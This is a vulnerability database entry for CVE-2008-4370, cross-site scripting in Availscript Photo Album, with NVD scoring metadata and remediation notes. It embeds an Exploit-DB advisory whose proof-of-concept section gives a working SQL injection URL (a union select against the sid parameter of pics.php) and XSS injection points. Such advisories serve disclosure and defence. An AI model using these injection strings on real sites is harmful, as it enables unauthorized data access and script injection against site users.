ID CVE-2008-4370
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:32:00
Description
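Multiple cross-site scripting (XSS) vulnerabilities in Availscript Photo Album allow remote attackers to inject arbitrary web script or HTML via the (1) sid parameter to pics.php and the (2) a parameter to view.php. The weakness is classified as CWE-79; the CVSS v2 base score is 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), and the record marks user interaction as required. The referenced Exploit-DB advisory (EDB-ID:6411) also reports SQL injection through the same sid parameter, tracked separately as CVE-2008-4369, and lists no fixed version. The 7.5 score on that Exploit-DB record covers both CVEs and should not be read as the severity of the XSS issue alone. Remediating a deployment therefore requires both output encoding of the sid and a parameter values wherever they are written into a page and parameterized queries for sid.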
{"id": "CVE-2008-4370", "bulletinFamily": "NVD", "title": "CVE-2008-4370", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Availscript Photo Album allow remote attackers to inject arbitrary web script or HTML via the (1) sid parameter to pics.php and the (2) a parameter to view.php.", "published": "2008-10-01T15:38:00", "modified": "2017-09-29T01:32:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4370", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/6411", "http://securityreason.com/securityalert/4330", "http://www.securityfocus.com/bid/31085", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45018"], "cvelist": ["CVE-2008-4370"], "type": "cve", "lastseen": "2021-02-02T05:35:17", "edition": 4, "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:6411"]}], "modified": "2021-02-02T05:35:17", "rev": 2}, "score": {"value": 4.4, "vector": "NONE", "modified": "2021-02-02T05:35:17", "rev": 2}, "vulnersScore": 4.4}, "cpe": ["cpe:/a:availscript:availscript_photo_album:*"], "affectedSoftware": [{"cpeName": "availscript:availscript_photo_album", "name": "availscript availscript photo album", "operator": "eq", "version": "*"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cpe23": ["cpe:2.3:a:availscript:availscript_photo_album:*:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": 
[{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:availscript:availscript_photo_album:*:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "31085", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/31085"}, {"name": "availscript-Photoalbum-pics-xss(45018)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/45018"}, {"name": "4330", "refsource": "SREASON", "tags": [], "url": "http://securityreason.com/securityalert/4330"}, {"name": "6411", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/6411"}]}
{"exploitdb": [{"lastseen": "2016-01-31T23:49:20", "description": "Availscript Photo Album (pics.php) Multiple Vulnerabilities. CVE-2008-4369,CVE-2008-4370. Webapps exploit for php platform", "published": "2008-09-09T00:00:00", "type": "exploitdb", "title": "Availscript Photo Album pics.php Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4370", "CVE-2008-4369"], "modified": "2008-09-09T00:00:00", "id": "EDB-ID:6411", "href": "https://www.exploit-db.com/exploits/6411/", "sourceData": "###########################################################\n# \n# ___ __ __ __ __ \n# /\\_ \\ /\\ \\\\ \\ /\\ \\/\\ \\ \n# ____\\//\\ \\ \\ \\ \\\\ \\ __ _ __ _\\ \\ \\ \\ \\ ____ \n# /',__\\ \\ \\ \\ \\ \\ \\\\ \\_ /\\ \\/'\\\\ \\/'\\\\ \\ \\ \\ \\/\\_ ,`\\ \n# /\\__, `\\ \\_\\ \\_\\ \\__ ,__\\\\> <\\\\> <\\\\ \\ \\_\\ \\/_/ /_ \n# \\/\\____/ /\\____\\\\/_/\\_\\_//\\_/\\_\\\\_/\\_\\ \\ \\_____\\/\\____\\\n# \\/___/ \\/____/ \\/_/ \\//\\/_///\\/_/ \\/_____/\\/____/\n# \n# security breakd0wn!\n###########################################################\n# \n# Title: Availscript Photo Album (pics.php) Multiple Vulnerabilities\n# Vendor: http://www.availscript.com/\n# Vulnerable Version: N/A\n# Fix: N/A\n# \n###########################################################\n# \n# c0ntact: sl4x.xuz[at]gmail[dot]com\n# d0rk: \"muahaha\"\n# stop lammo\n# \n###########################################################\n\n######################\n 1. Information\n######################\n With this script you can add pictures in categories create album or wallpaper website.\n\n######################\n 2. Vulnerabilities\n######################\n SQL Injection in \"pics.php\" in the \"sid\" parameter.\n Cross Site Scripting in \"pics.php\" in the \"sid\" parameter.\n Cross Site Scripting in \"view.php\" in the \"a\" parameter.\n\n######################\n 3. 
PoC\n######################\n http://localhost/path/pics.php?sid=-1+union+select+database(),2,3,4,5,6,7,8,version(),10,11,12--\n http://localhost/path/pics.php?sid=[XSS]\n http://localhost/path/view.php?a=[XSS]\n\n###########################################################\n\n# milw0rm.com [2008-09-09]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6411/"}]}